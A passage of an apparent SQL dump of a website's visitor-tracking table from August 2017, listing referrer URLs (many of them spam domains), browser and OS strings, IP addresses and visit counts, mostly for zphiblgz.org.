hrome','Windows','50.0.2661.102','','188.165.164.185','000',6,0),(8648,'2017-08-07','https://blogg.hioa.no/stm/tag/steen-steensen/','Chrome','Windows','50.0.2661.102','','164.132.188.193','000',1,0),(8649,'2017-08-07','http://zphiblgz.org','Firefox','Windows','40.1','','78.184.79.98','000',1,0),(8650,'2017-08-07','http://www.daviscountyutah.gov/images/librariesprovider10/default-album/5af4a314f13296568a4f7ff3c0015e574.jpg?sfvrsn=4b635453_0\\\\\\\'','Chrome','Windows','50.0.2661.102','','145.239.62.130','000',3,0),(8651,'2017-08-07','http://itreviewadd.ml/papers/get-pre-school-picture-stickers-numbers-by-9781851290802-chm.html','Chrome','Windows','50.0.2661.102','','145.239.62.132','000',2,0),(8652,'2017-08-07','https://www.marybaldwin.edu/event-directory/','Chrome','Windows','50.0.2661.102','','178.32.155.117','000',4,0),(8653,'2017-08-07','https://blog.merlot.org/2017/07/14/merlot-in-any-language-is-still-merlot/?share=twitter','Chrome','Windows','50.0.2661.102','','79.137.116.219','000',4,0),(8654,'2017-08-07','https://erincondren.com/dream-catcher-classic-notepads','Chrome','Windows','50.0.2661.102','','79.137.116.220','000',2,0),(8655,'2017-08-07','https://blogg.hioa.no/william/wp-content/themes/twentytwelve/css/ie.css?ver=20121010\\\\\\\'','Chrome','Windows','50.0.2661.102','','145.239.62.137','000',2,0),(8656,'2017-08-07','http://ihe.nl/chair-groups/sanitary-engineering','Chrome','Windows','50.0.2661.102','','178.32.155.121','000',2,0),(8657,'2017-08-07','http://blog.lowellschool.org/blog/school-talks-top-ten-blog-posts-2016','Chrome','Windows','50.0.2661.102','','145.239.62.118','000',2,0),(8658,'2017-08-07','https://erincondren.com/floating-florals-file-folders','Chrome','Windows','50.0.2661.102','','145.239.62.129','000',2,0),(8659,'2017-08-07','https://www.developpez.net/forums/d1734990/php/outils/zend/zend-framework/personnaliser-script-requet-php-mysql/','Chrome','Windows','50.0.2661.102','','145.239.62.127','000',2,0),(8660,'2017-08-07','http://movieposter.com/g410/TEEN_posters-0.html','Chrome','Windows','50.0.2661.102','','92.222.81.228','000',6,0),(8661,'2017-08-07','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1506.No1qNfqew2u57-c8ZzWvScFgl4mfx0iuTuFXniaY_o-GvY-QgSJNk_lync-dbNX_.d9fa3aa27a4089c61d8e21a456ab26f9dfd2cc57&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YKCJkrjchpDstTwxTkjwGrA&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSS1zUE1TOUU5TVVYWE54bG1LWDktN1NPZVdaWmwtOG5ZeWxoOEVLUDQ3UDNwdlF1WHlaRDhD&b64e=2&sign=c329b7f3cdfa810985e2339cc03fd809&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQULnoVAFacUfowlY2cZru-D8DUaBNZK3U0Nln8oS46Xn_vB_1B3v15E9Cr98s9V4cz6Dns2UZV02qeCHcZXztJgs6SVL09MP6nd7nZ6T2bTRCQASSuK0LhHLjD16nERIPg&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCUrYE_V40103rMMMtRBVVo_2YBU30aXzx97Ij5pKa0L9fLquk192nd7DX6n2pmMNn0u9lKcCJDPBg&l10n=ru&cts=1502157389695&mc=7.48268989885','Firefox','Windows','53.0','','37.110.150.20','000',1,0),(8662,'2017-08-07','https://modelbrouwers.nl/winkel/microscale/microscale-flat-coat-mat-beschermingslaag','Chrome','Windows','50.0.2661.102','','164.132.210.75','000',2,0),(8663,'2017-08-07','http://english1113fall10.wordpress.com/2010/11/19/resources-for-finding-images-video-sounds-and-music/','Chrome','Windows','50.0.2661.102','','178.32.155.95','000',2,0),(8664,'2017-08-07','http://www.law.utoronto.ca/','Chrome','Windows','50.0.2661.102','','145.239.62.120','000',2,0),(8665,'2017-08-07','http://www.thepublicindex.org/archives/2110','Chrome','Windows','50.0.2661.102','','145.239.62.140','000',2,0),(8666,'2017-08-07','http://www.thepublicindex.org/archives/774','Chrome','Windows','50.0.2661.102','','79.137.116.216','000',1,0),(8667,'2017-08-07','http://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.69','000',2,0),(8668,'2017-08-07','https://movies4u.pro/watch-agent-carter-season-2-online/?link=17','Chrome','Windows','50.0.2661.102','','79.137.116.221','000',1,0),(8669,'2017-08-07','https://www.bing.com/','Edge','Windows','15.15063','','69.250.64.98','000',1,0),(8670,'2017-08-08','http://zphiblgz.org','Firefox','Windows','40.1','','139.190.24.129','000',2,0),(8671,'2017-08-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','65.19.167.130','000',2,0),(8672,'2017-08-08','http://pavlodar.xkaz.org/','MSIE','Windows','2.0','','46.118.158.199','000',1,0),(8673,'2017-08-08','http://zphiblgz.org','Firefox','Windows','40.1','','217.165.236.194','000',2,0),(8674,'2017-08-08','zphiblgz.org','Chrome','Windows','50.0.2661.75','','62.77.94.15','000',10,0),(8675,'2017-08-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','212.129.9.202','000',1,0),(8676,'2017-08-08','zphiblgz.org','Chrome','Windows','50.0.2661.75','','150.164.128.1','000',1,0),(8677,'2017-08-08','https://emerson-rus.ru/','MSIE','Windows','5.5','','46.118.158.199','000',1,0),(8678,'2017-08-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.139.161','000',2,0),(8679,'2017-08-08','http://zphiblgz.org','MSIE','Windows','6.0','','46.8.255.108','000',1,0),(8680,'2017-08-08','http://fr-bearings.ru/','MSIE','Windows','4.01','','46.119.112.177','000',1,0),(8681,'2017-08-08','https://timhost.ru/','MSIE','Windows','5.5','','46.118.112.220','000',2,0),(8682,'2017-08-08','https://letsart.ru/','MSIE','Windows','5.5','','178.137.4.41','000',5,0),(8683,'2017-08-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','164.132.51.91','000',2,0),(8684,'2017-08-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','156.67.106.32','000',2,0),(8685,'2017-08-08','http://krasivoe-hd.net/','MSIE','Windows','6.0','','46.119.112.177','000',3,0),(8686,'2017-08-08','http://zphiblgz.org/','MSIE','Windows','10.0','','46.17.97.112','000',1,0),(8687,'2017-08-08','http://zphiblgz.org','MSIE','Windows','6.0','','45.55.224.77','000',1,0),(8688,'2017-08-08','http://stroyplus.ru/','Unknown','Unknown','Unknown','','188.163.72.17','000',3,0),(8689,'2017-08-08','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',17,0),(8690,'2017-08-08','http://www.zphiblgz.org','MSIE','Windows','9.0','','184.154.36.185','000',39,0),(8691,'2017-08-08','https://stillmiracle.com/','Opera','Windows','7.0','','46.118.158.199','000',2,0),(8692,'2017-08-08','http://zphiblgz.org','Safari','Linux','538.1','','104.160.12.181','000',1,0),(8693,'2017-08-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','188.209.52.9','000',2,0),(8694,'2017-08-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.90.12.88','000',2,0),(8695,'2017-08-08','http://zphiblgz.org','Firefox','Windows','40.1','','202.180.121.39','000',1,0),(8696,'2017-08-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.124','000',1,0),(8697,'2017-08-08','http://technika-remont.ru/','MSIE','Windows','6.0','','46.118.112.220','000',3,0),(8698,'2017-08-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.137.79.167','000',2,0),(8699,'2017-08-08','http://zphiblgz.org','Firefox','Windows','48.0','','78.85.249.142','000',1,0),(8700,'2017-08-08','http://zphiblgz.org','Chrome','Windows','60.0.3112.90','','24.234.203.108','000',1,0),(8701,'2017-08-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.169.135.133','000',2,0),(8702,'2017-08-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.70.39.41','000',1,0),(8703,'2017-08-08','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',1,0),(8704,'2017-08-08','https://ikritikimou.gr/','MSIE','Windows','6.0','','46.118.158.199','000',2,0),(8705,'2017-08-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.43.205','000',2,0),(8706,'2017-08-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','212.47.227.114','000',2,0),(8707,'2017-08-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.87.210','000',1,0),(8708,'2017-08-08','http://zphiblgz.org/','Firefox','Windows','7.0.1','','89.31.57.5','000',1,0),(8709,'2017-08-08','http://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.14','000',1,0),(8710,'2017-08-08','https://google.com','Firefox','Linux','26.0','','37.59.4.151','000',1,0),(8711,'2017-08-08','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.86','000',1,0),(8712,'2017-08-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.170.196','000',4,0),(8713,'2017-08-09','http://zphiblgz.org','Firefox','Windows','40.1','','91.221.212.48','000',1,0),(8714,'2017-08-09','https://vk.com/vps_vds_dedicated_server','MSIE','Windows','6.0','','178.137.154.138','000',3,0),(8715,'2017-08-09','http://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.7','000',1,0),(8716,'2017-08-09','http://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','87.236.215.233','000',12,0),(8717,'2017-08-09','http://zphiblgz.org','Firefox','Windows','3.6.3','','54.158.222.163','000',1,0),(8718,'2017-08-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','171.25.193.131','000',2,0),(8719,'2017-08-09','http://zphiblgz.org','Firefox','Windows','40.1','','202.152.72.31','000',2,0),(8720,'2017-08-09','http://zphiblgz.org','Chrome','Windows','45.0.2454.93','','202.46.48.95','000',1,0),(8721,'2017-08-09','http://zphiblgz.org','Chrome','Windows','45.0.2454.93','','202.46.50.86','000',1,0),(8722,'2017-08-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.38.208.57','000',2,0),(8723,'2017-08-09','http://zphiblgz.org','MSIE','Windows','6.0','','81.177.3.147','000',1,0),(8724,'2017-08-09','https://minharevisao.com/','Opera','Windows','9.0','','188.163.72.17','000',3,0),(8725,'2017-08-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','91.185.191.209','000',2,0),(8726,'2017-08-09','http://zphiblgz.org','Firefox','Windows','40.1','','178.135.82.140','000',2,0),(8727,'2017-08-09','http://zphiblgz.org','MSIE','Windows','8.0','','64.235.154.104','000',2,0),(8728,'2017-08-09','http://www.notbred.com/','Chrome','Windows','57.0.2987.133','','185.36.102.114','000',2,0),(8729,'2017-08-09','http://zphiblgz.org','MSIE','Windows','6.0','','188.65.211.238','000',1,0),(8730,'2017-08-09','http://yoshkarola.zrus.org/','Opera','Windows','7.11','','46.118.112.220','000',3,0),(8731,'2017-08-09','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1508.cGHP81dqbuetdPSaeEqEL85UEe6Bod7YKWsXscq-rpyr9jCPoZramueOa4TPZA8B.46ce58e678e4ae1ec7152d7f5aabdc35ca9792e7&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGftRg9cP1erjBfVTUcXDXk&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSS1zUE1TOUU5TVViMTN1N192S2NISU1rVnBqLS00UF81N19EN3V3dmJieTVWVGVHZHBIRE4x&b64e=2&sign=954958a7f1695f1a2a6750dca9ab0590&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQULnoVAFacUfzviNE8E79DnisQ2w78dpBVh6Rz60X9jx_6Pl_nC4smB2Ukb9xi8JPRQ2WEtgKvdgTChdHhDUxUbSg5qMuNIvVDDPI9r99DlbBiH5bkeSS61xg6RNZisC4Q&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWnZFFdfsDYFbxqrJRpWx1TDgg0pA-Ey2oBVn_895qZM3XBmrOH9khtiXtjRKMknEkeY093lL0u0w&l10n=ru&cts=1502290319819&mc=1.93829720916','Firefox','Windows','53.0','','37.145.114.135','000',1,0),(8732,'2017-08-09','https://mmostrike.ru/','Opera','Windows','9.0','','46.119.112.177','000',4,0),(8733,'2017-08-09','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',2,0),(8734,'2017-08-09','http://zphiblgz.org','Firefox','Linux','54.0','','138.197.111.175','000',1,0),(8735,'2017-08-09','http://zphiblgz.org','Unknown','Unknown','Unknown','','46.118.121.208','000',2,0),(8736,'2017-08-09','http://zphiblgz.org','Firefox','Windows','40.1','','79.168.148.143','000',1,0),(8737,'2017-08-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.10.68.95','000',2,0),(8738,'2017-08-09','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1508.D4aNqbXBfuK0LdjF6YDiYHq7YIEfOehmAVfzsHDw3zApA50pho03Wzo681GeZBU4.0882a084f3a0bada343b24731eb3224beb19a5d0&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YM1sNxN_KHOPADPyHdOKa1Y&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSS1zUE1TOUU5TVVWc3dRTklRQXdnZDRaVms4ZG9POEVTWXlob0U2N3B2WmxLQ2RqLTlUOGhP&b64e=2&sign=5604253470168c10c460b3249e20f596&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQSaYtyyri96FWbY0B85mvoclQGMiuA6Ba3jvATSskpQzlfGCbbIQGAxUndb1bikEY7wvEEgJAeT_rtb249GA0R9m8U-qUrO_tA6ZmlvczVKFRvNYiMpBpk1ZtxA5lm3ui2Y2vap-0Q--&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXEfKO1imoOE1kVRQe1YxBbjwhHZqSsd10_n_S7Xs91l6TBAJkYKguv-skXdBjYWkobWLtPuiLglQ&l10n=ru&cts=1502298477196&mc=3.76210555161','Firefox','Windows','53.0','','178.140.99.214','000',1,0),(8739,'2017-08-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.202','000',1,0),(8740,'2017-08-09','http://www.zahvat.ru/','MSIE','Windows','2.0','','188.163.79.53','000',1,0),(8741,'2017-08-09','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',2,0),(8742,'2017-08-09','http://www.zphiblgz.org','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(8743,'2017-08-09','http://zphiblgz.org','Firefox','Windows','40.1','','103.193.18.156','000',1,0),(8744,'2017-08-09','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(8745,'2017-08-09','http://zphiblgz.org','Firefox','Windows','40.1','','80.77.34.236','000',2,0),(8746,'2017-08-09','http://zphiblgz.org','Firefox','Windows','40.1','','84.109.145.179','000',1,0),(8747,'2017-08-09','http://zphiblgz.org','Firefox','Windows','40.1','','105.94.181.17','000',2,0),(8748,'2017-08-09','http://zphiblgz.org','curl','Unknown','7.54.1','','95.211.38.161','000',1,0),(8749,'2017-08-09','http://zphiblgz.org','MSIE','Windows','11.0','','192.187.123.162','000',10,0),(8750,'2017-08-09','https://www.google.com/','Chrome','Windows','60.0.3112.90','','50.205.129.3','000',1,0),(8751,'2017-08-09','http://zphiblgz.org','Safari','iPhone','9.0','','124.235.138.16','000',1,0),(8752,'2017-08-09','http://zphiblgz.org','Safari','iPhone','9.0','','117.88.107.47','000',1,0),(8753,'2017-08-09','http://shymkent.xkaz.org/','MSIE','Windows','6.0','','46.118.158.199','000',5,0),(8754,'2017-08-09','http://zphiblgz.org','Firefox','Windows','40.1','','78.20.105.114','000',1,0),(8755,'2017-08-09','http://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.3','000',1,0),(8756,'2017-08-09','http://zphiblgz.org','Chrome','Chrome OS','55.0.2883.103','','69.143.34.19','000',10,0),(8757,'2017-08-09','http://zphiblgz.org','Chrome','Windows','41.0.2227.0','','195.22.127.196','000',2,0),(8758,'2017-08-09','https://23kw.ru/','MSIE','Windows','6.0','','46.118.125.246','000',2,0),(8759,'2017-08-09','http://zphiblgz.org','Chrome','Macintosh','60.0.3112.90','','138.197.111.197','000',1,0),(8760,'2017-08-09','http://zphiblgz.org','Firefox','Macintosh','54.0','','138.197.111.197','000',2,0),(8761,'2017-08-09','http://zphiblgz.org','Chrome','Linux','59.0.3071.115','','138.197.111.197','000',1,0),(8762,'2017-08-09','http://zphiblgz.org','Chrome','Windows','49.0.2623.75','','138.197.111.197','000',1,0),(8763,'2017-08-09','http://zphiblgz.org','Chrome','Windows','60.0.3112.78','','138.197.111.197','000',3,0),(8764,'2017-08-09','http://zphiblgz.org','Safari','Macintosh','10.0.3','','138.197.111.197','000',1,0),(8765,'2017-08-09','http://zphiblgz.org','Opera Next','Macintosh','46.0.2597.57','','138.197.111.197','000',1,0),(8766,'2017-08-09','http://zphiblgz.org','Chrome','Windows','51.0.2704.103','','54.160.122.176','000',1,0),(8767,'2017-08-09','https://www.facebook.com/businesses.center/','Opera','Windows','9.0','','178.137.4.41','000',1,0),(8768,'2017-08-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.137.174','000',2,0),(8769,'2017-08-09','http://zphiblgz.org','Firefox','Windows','40.0','','78.46.82.170','000',1,0),(8770,'2017-08-10','http://zphiblgz.org','Firefox','Windows','51.0','','94.46.247.215','000',1,0),(8771,'2017-08-10','http://videochat.ph/','MSIE','Windows','6.0','','46.118.118.100','000',2,0),(8772,'2017-08-10','http://chatroulette.world/','MSIE','Unknown','6.0','','46.118.118.100','000',2,0),(8773,'2017-08-10','https://pl-top.pl/','MSIE','Windows','6.0','','188.163.79.53','000',1,0),(8774,'2017-08-10','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.86','000',1,0),(8775,'2017-08-10','http://www.google.com/search','Chrome','Linux','41.0.2272.118','','66.102.7.144','000',1,0),(8776,'2017-08-10','http://zphiblgz.org','MSIE','Windows','11.0','','34.209.182.200','000',1,0),(8777,'2017-08-10','http://zphiblgz.org','Firefox','Windows','40.1','','94.229.206.72','000',2,0),(8778,'2017-08-10','http://zphiblgz.org','Firefox','Windows','40.1','','92.167.12.231','000',1,0),(8779,'2017-08-10','http://copro.pw/','MSIE','Windows','6.0','','46.118.125.246','000',3,0),(8780,'2017-08-10','http://zphiblgz.org','Firefox','Windows','40.1','','190.246.189.37','000',1,0),(8781,'2017-08-10','http://zphiblgz.org','MSIE','Windows','6.0','','46.8.255.108','000',1,0),(8782,'2017-08-10','http://zphiblgz.org','Safari','iPhone','6.0','','123.126.113.104','000',1,0),(8783,'2017-08-10','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1509.VcugKkg9P3CquGo__w51LafNzgW6ckau7XfAP-lrIhjVu0DxyePSsZdAC0pElvC4.c38ce42b30d3da3572ebc255c3b8dccce867e13a&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YCYBcIrWNUha-mUlBiA3OhY&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSS1zUE1TOUU5TVVXN01Dd1h0WXBGT2hhNnl4ckVRb0J3RnkzSU1JR2JLU3JYelVHeTZfdWZZ&b64e=2&sign=f9fd1a345857d8712e0e3409ac5d4eb8&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQe3IrxbPWIv4qsy3KfxbLkHLZrBhbvjx4D9z6VjOGohooOH10ca9F5UDuAD5bNOUDPtpGWWT1TPOzPQnru-09R3CyGYC9vHRhT8UezMhACe5xlNPfMdgqwznjxq0P6qSZX6CC5yfowD-&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXZIHNQeCnAdrnFShRa5-o0GuwpB8sCG_na2LyCNiQAdmGNKTl1nkHxAM7OPFuSKulH7tQw4wV1Jg&l10n=ru&cts=1502361804028&mc=6.63823291224','Firefox','Windows','53.0','','94.180.130.160','000',1,0),(8784,'2017-08-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.8.198','000',2,0),(8785,'2017-08-10','http://zphiblgz.org','Firefox','Windows','40.1','','103.252.24.47','000',2,0),(8786,'2017-08-10','http://zphiblgz.org','Firefox','Windows','40.1','','41.202.81.21','000',2,0),(8787,'2017-08-10','http://mebel-vstroika.ru/','MSIE','Windows','5.5','','178.137.4.41','000',2,0),(8788,'2017-08-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.70.39.41','000',4,0),(8789,'2017-08-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','87.118.122.30','000',2,0),(8790,'2017-08-10','http://zphiblgz.org','Firefox','Windows','40.1','','177.67.139.62','000',1,0),(8791,'2017-08-10','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.51','000',1,0),(8792,'2017-08-10','http://www.zetmaster.ru/','MSIE','Windows','6.0','','134.249.80.194','000',3,0),(8793,'2017-08-10','http://zphiblgz.org','Firefox','Windows','40.1','','187.95.127.253','000',1,0),(8794,'2017-08-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','162.247.72.200','000',2,0),(8795,'2017-08-10','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.96','000',1,0),(8796,'2017-08-10','http://zphiblgz.org','Firefox','Windows','1.0.7','','54.186.187.182','000',1,0),(8797,'2017-08-10','http://zphiblgz.org','MSIE','Windows','11.0','','216.99.180.223','000',1,0),(8798,'2017-08-10','http://zphiblgz.org','Unknown','Unknown','Unknown','','54.186.187.182','000',1,0),(8799,'2017-08-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','18.85.22.204','000',1,0),(8800,'2017-08-10','http://zphiblgz.org/','Firefox','Windows','7.0.1','','191.96.249.110','000',1,0),(8801,'2017-08-10','http://zphiblgz.org/','Chrome','Windows','57.0.2987.133','','146.185.223.114','000',2,0),(8802,'2017-08-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','173.14.173.227','000',2,0),(8803,'2017-08-10','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',2,0),(8804,'2017-08-10','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',3,0),(8805,'2017-08-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.101.137','000',2,0),(8806,'2017-08-10','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(8807,'2017-08-10','http://zphiblgz.org','Firefox','Windows','40.1','','187.23.68.228','000',1,0),(8808,'2017-08-10','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','91.208.99.2','000',1,0),(8809,'2017-08-10','https://search.yahoo.com/','Firefox','Macintosh','54.0','','99.170.210.196','000',1,0),(8810,'2017-08-10','http://macrotek.ru/','MSIE','Windows','3.02','','188.163.79.53','000',1,0),(8811,'2017-08-10','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',1,0),(8812,'2017-08-10','http://zphiblgz.org/','Chrome','Windows','57.0.2987.133','','163.172.4.153','000',1,0),(8813,'2017-08-10','http://zphiblgz.org','Firefox','Windows','40.1','','41.110.183.4','000',1,0),(8814,'2017-08-10','http://zphiblgz.org','MSIE','Windows','6.0','','46.17.42.76','000',1,0),(8815,'2017-08-10','http://zphiblgz.org','MSIE','Windows','6.0','','185.20.184.85','000',1,0),(8816,'2017-08-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.223.200','000',2,0),(8817,'2017-08-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','120.29.217.46','000',2,0),(8818,'2017-08-10','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','158.69.248.85','000',2,0),(8819,'2017-08-10','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','74.85.220.113','000',1,0),(8820,'2017-08-10','http://zphiblgz.org','Firefox','Windows','40.1','','186.7.142.26','000',1,0),(8821,'2017-08-10','http://zphiblgz.org','Safari','iPhone','10.0','','71.121.204.212','000',5,0),(8822,'2017-08-10','https://woweb.com.ua/','MSIE','Windows','4.01','','46.118.118.100','000',2,0),(8823,'2017-08-10','https://mansparskats.com/','MSIE','Windows','6.0','','178.137.162.238','000',3,0),(8824,'2017-08-10','http://www.zahvat.ru/','Opera','Windows','9.00','','188.163.79.53','000',1,0),(8825,'2017-08-11','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.96','000',1,0),(8826,'2017-08-11','http://zphiblgz.org','Firefox','Windows','40.1','','104.250.164.44','000',1,0),(8827,'2017-08-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','144.217.167.240','000',2,0),(8828,'2017-08-11','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.244.82','000',2,0),(8829,'2017-08-11','http://kemerovo.zrus.org/','MSIE','Windows','2.0d','','46.118.125.246','000',2,0),(8830,'2017-08-11','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','217.160.253.18','000',1,0),(8831,'2017-08-11','http://zphiblgz.org','MSIE','Windows','11.0','','23.21.112.27','000',2,0),(8832,'2017-08-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.202','000',2,0),(8833,'2017-08-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.74','000',2,0),(8834,'2017-08-11','http://zphiblgz.org/','Chrome','Windows','59.0.3071.86','','201.74.155.209','000',3,0),(8835,'2017-08-11','http://zphiblgz.org','Chrome','Windows','59.0.3071.86','','192.198.80.227','000',2,0),(8836,'2017-08-11','http://zphiblgz.org','Firefox','Windows','1.0.7','','34.227.192.30','000',1,0),(8837,'2017-08-11','http://zphiblgz.org','Firefox','Windows','40.1','','101.50.122.121','000',2,0),(8838,'2017-08-11','http://zphiblgz.org','MSIE','Windows','11.0','','153.31.113.21','000',4,0),(8839,'2017-08-11','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','103.67.235.27','000',2,0),(8840,'2017-08-11','http://zphiblgz.org','Firefox','Windows','40.1','','39.43.193.184','000',2,0),(8841,'2017-08-11','http://zphiblgz.org','Firefox','Windows','40.0','','195.22.127.140','000',2,0),(8842,'2017-08-11','http://zphiblgz.org','Firefox','Windows','40.1','','2.90.255.193','000',1,0),(8843,'2017-08-11','http://zphiblgz.org','Safari','iPhone','10.0','','174.205.0.138','000',3,0),(8844,'2017-08-11','http://zphiblgz.org','curl','Unknown','7.54.1','','95.211.38.161','000',2,0),(8845,'2017-08-11','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.99','000',1,0),(8846,'2017-08-11','http://zphiblgz.org','Firefox','Windows','40.1','','46.11.98.96','000',1,0),(8847,'2017-08-11','http://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.16','000',1,0),(8848,'2017-08-11','http://demian.kz/','Opera','Windows','8.01','','46.118.118.100','000',2,0),(8849,'2017-08-11','https://www.souvenirua.com/','MSIE','Windows','6.0','','46.118.125.246','000',2,0),(8850,'2017-08-11','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.85','000',1,0),(8851,'2017-08-11','http://zphiblgz.org','Safari','iPhone','10.0','','216.99.180.241','000',1,0),(8852,'2017-08-11','http://zphiblgz.org','Chrome','Chrome OS','55.0.2883.103','','174.205.0.138','000',1,0),(8853,'2017-08-11','https://educontest.net/','MSIE','Windows','4.01','','188.163.79.53','000',3,0),(8854,'2017-08-11','https://emerson-rus.ru/','MSIE','Windows','6.0','','46.118.154.36','000',3,0),(8855,'2017-08-11','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(8856,'2017-08-11','http://zphiblgz.org/','MSIE','Windows','11.0','','196.54.55.21','000',1,0),(8857,'2017-08-11','http://zphiblgz.org/','Chrome','Windows','30.0.1599.13014','','155.133.82.107','000',2,0),(8858,'2017-08-11','http://zphiblgz.org','Firefox','Windows','40.1','','152.254.249.78','000',1,0),(8859,'2017-08-11','http://videochat.life/','MSIE','Windows','6.0','','46.118.118.100','000',3,0),(8860,'2017-08-11','http://zphiblgz.org/','Firefox','Windows','53.0','','213.111.233.25','000',1,0),(8861,'2017-08-11','http://www.zphibmaryland.org/chapters/','Firefox','Windows','54.0','','209.124.166.38','000',2,0),(8862,'2017-08-11','http://www.z-master.ru/','MSIE','Windows','6.0','','134.249.80.194','000',3,0),(8863,'2017-08-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.134.234.247','000',2,0),(8864,'2017-08-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.129.246','000',2,0),(8865,'2017-08-11','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','213.239.195.172','000',1,0),(8866,'2017-08-11','http://zphiblgz.org','wp-windowsphone','Unknown','Unknown','','213.239.195.172','000',1,0),(8867,'2017-08-11','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',2,0),(8868,'2017-08-11','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',3,0),(8869,'2017-08-11','https://www.facebook.com/businesses.center/','Unknown','Unknown','Unknown','','178.137.4.41','000',2,0),(8870,'2017-08-11','http://weburok.com/','MSIE','Windows','3.02','','46.118.125.246','000',3,0),(8871,'2017-08-11','http://zphiblgz.org','Safari','iPhone','10.0','','6